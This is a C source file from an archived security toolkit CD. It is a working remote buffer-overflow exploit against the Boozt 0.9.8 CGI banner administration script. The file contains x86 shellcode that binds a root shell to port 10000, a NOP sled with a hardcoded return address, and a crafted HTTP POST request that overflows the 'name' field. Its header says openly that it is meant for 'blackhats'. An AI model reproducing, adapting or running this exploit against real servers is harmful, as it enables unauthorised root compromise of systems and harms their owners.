home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / boozt / ES-booz.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  8KB  |  171 lines

---

1. /* -----------------------------------------------------------------------
2.  
3.    BOOZT! Not so Standard 0.9.8 CGI vulnerability exploit
4.    fixed/updated by BrainStorm - ElectronicSouls
5.    now its much more usefull ;>
6.  
7.    Original Code by: Rafael San Miguel Carrasco - rsanmcar@alum.uax.es
8.  
9.    script kiddie enabled! .. this will give you a rootshell on port 10000
10.    so this version isnt for admins its for blackhats! and kidz piss off!
11.    this isnt widely used so nothing for kiddies anyway, since they cant own
12.    100 systems with it =P ..
13.  
14.    greetz: ghQst,FreQ,it_fresh,SectorX,RobBbot,0x90,Resistor,Phantom,
15.            divineint,rocsteele,websk8ter,nutsax,BuRn-X and all other
16.            ElectronicSouls members - j00 r0ck =>
17.  
18.    -----------------------------------------------------------------------
19. */
20.  
21.  
22. #include <netinet/in.h>
23.  
24. #define PORT 8080
25. #define BUFLEN 1597
26. #define RET 0xbffff297
27. #define NOP 0x90
28.  
29. int main (int argc, char **argv)
30. {
31.        int sockfd,
32.                 i,
33.              cont;
34.  
35.         struct sockaddr_in dest;
36.  
37.         int html_len = 15;
38.  
39.         char cgicontent[2048];
40.         char buf[BUFLEN];
41.         char shellcode[]=  "\x31\xc0"                   // xor     eax, eax
42.                            "\x31\xdb"                   // xor     ebx, ebx
43.                            "\x89\xe5"                   // mov     ebp, esp
44.                            "\x99"                       // cdq
45.                            "\xb0\x66"                   // mov     al, 102
46.                            "\x89\x5d\xfc"               // mov     [ebp-4], ebx
47.                            "\x43"                       // inc     ebx
48.                            "\x89\x5d\xf8"               // mov     [ebp-8], ebx
49.                            "\x43"                       // inc     ebx
50.                            "\x89\x5d\xf4"               // mov     [ebp-12], ebx
51.                            "\x4b"                       // dec     ebx
52.                            "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
53.                            "\xcd\x80"                   // int     80h
54.                            "\x89\x45\xf4"               // mov     [ebp-12], eax
55.                            "\x43"                       // inc     ebx
56.                            "\x66\x89\x5d\xec"           // mov     [ebp-20], bx
57.                            "\x66\xc7\x45\xee\x27\x10"   // mov     [ebp-18], word 4135
58.                            "\x89\x55\xf0"               // mov     [ebp-16], edx
59.                            "\x8d\x45\xec"               // lea     eax, [ebp-20]
60.                            "\x89\x45\xf8"               // mov     [ebp-8], eax
61.                            "\xc6\x45\xfc\x10"           // mov     [ebp-4], byte 16
62.                            "\xb2\x66"                   // mov     dl, 102
63.                            "\x89\xd0"                   // mov     eax, ed
64.                            "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
65.                            "\xcd\x80"                   // int     80h
66.                            "\x89\xd0"                   // mov     eax, edx
67.                            "\xb3\x04"                   // mov     bl, 4
68.                            "\xcd\x80"                   // int     80h
69.                            "\x43"                       // inc     ebx
70.                            "\x89\xd0"                   // mov     eax, edx
71.                            "\x99"                       // cdq
72.                            "\x89\x55\xf8"               // mov     [ebp-8], edx
73.                            "\x89\x55\xfc"               // mov     [ebp-4], edx
74.                            "\xcd\x80"                   // int     80h
75.                            "\x31\xc9"                   // xor     ecx, ecx
76.                            "\x89\xc3"                   // mov     ebx, eax
77.                            "\xb1\x03"                   // mov     cl, 3
78.                            "\xb0\x3f"                   // mov     al, 63
79.                            "\x49"                       // dec     ecx
80.                            "\xcd\x80"                   // int     80h
81.                            "\x41"                       // inc     ecx
82.                            "\xe2\xf8"                   // loop    -7
83.                            "\x52"                       // push    edx
84.                            "\x68\x6e\x2f\x73\x68"       // push    dword 68732f6eh
85.                            "\x68\x2f\x2f\x62\x69"       // push    dword 69622f2fh
86.                            "\x89\xe3"                   // mov     ebx, esp
87.                            "\x52"                       // push    edx
88.                            "\x53"                       // push    ebx
89.                            "\x89\xe1"                   // mov     ecx, esp
90.                            "\xb0\x0b"                   // mov     al, 11
91.                            "\xcd\x80";                  // int     80h
92.  
93.         char *html[15] =
94.         {
95.                 "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n",
96.                 "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*\n",
97.                 "Referer: http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1\n",
98.                 "Accept-Language: en, de\n",
99.                 "Content-Type: application/x-www-form-urlencoded\n",
100.                 "UA-pixels: 640x480\n",
101.                 "UA-color: color8\n",
102.                 "UA-OS: Blackhat Leenux\n",
103.                 "UA-CPU: x86\n",
104.                 "User-Agent: Hackscape/1.0 (j00r asS gonna gets 0wned)\n",
105.                 "Host: 10.0.0.1:8080\n",
106.                 "Connection: Keep-Alive\n",
107.                 "Content-Length: 1776\n",
108.                 "Pragma: No-Cache\n",
109.                 "\n",
110.         };
111.  
112.         if (argc < 2)
113.         {
114.                 printf ("usage: %s <IP>\n", argv[0]);
115.                 exit (-1);
116.         }
117.  
118.         printf ("\n-----------------------------------\n");
119.         printf ("   BOOZT! Not so Standard exploit    \n");
120.         printf (" (C) BrainStorm - ElectronicSouls    \n");
121.         printf ("-----------------------------------\n\n");
122.         for (i = 0; i < BUFLEN; i+=4)*( (long *) &buf[i]) = RET;
123.         for (i = 0; i < (BUFLEN - 16); i++) buf[i] = NOP;
124.         cont = 0;
125.         for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
126.                   buf[i] = shellcode [cont++];
127.         strcpy (cgicontent, "name=");
128.         strncat (cgicontent, buf, sizeof (buf));
129.         strcat (cgicontent,"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&
130. source_flash_path=Browse...&script_name=&input=1§ion=5&sent=1&submit=Create+New+Banner");
131.  
132.         printf ("* Connecting ...\n");
133.         if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
134.         {
135.          perror ("socket");
136.          exit (-1);
137.         }
138.         bzero (&dest, sizeof (dest));
139.         dest.sin_family = AF_INET;
140.         dest.sin_port = htons (PORT);
141.         dest.sin_addr.s_addr = inet_addr (argv[1]);
142.         if (connect (sockfd, &dest, sizeof (dest)) < 0)
143.         {
144.          perror ("connect");
145.          exit (-1);
146.         }
147.         printf ("* Connected. sending data ...\n");
148.         for (i = 0; i < html_len; i++)
149.         {
150.          if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
151.         {
152.          perror ("write");
153.          exit (-1);
154.         }
155.         }
156.         if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
157.         {
158.          perror ("write cgicontent");
159.          exit (-1);
160.         }
161.         if (close (sockfd) < 0)
162.         {
163.          perror ("close");
164.          exit (-1);
165.         }
166.         printf("now connect to port 10000 on the victim host..          \n");
167.         printf("if everything went well you should get a rootshell :> \n\n");
168.         printf("enjoy..\n");
169.         return 0;
170. }
171.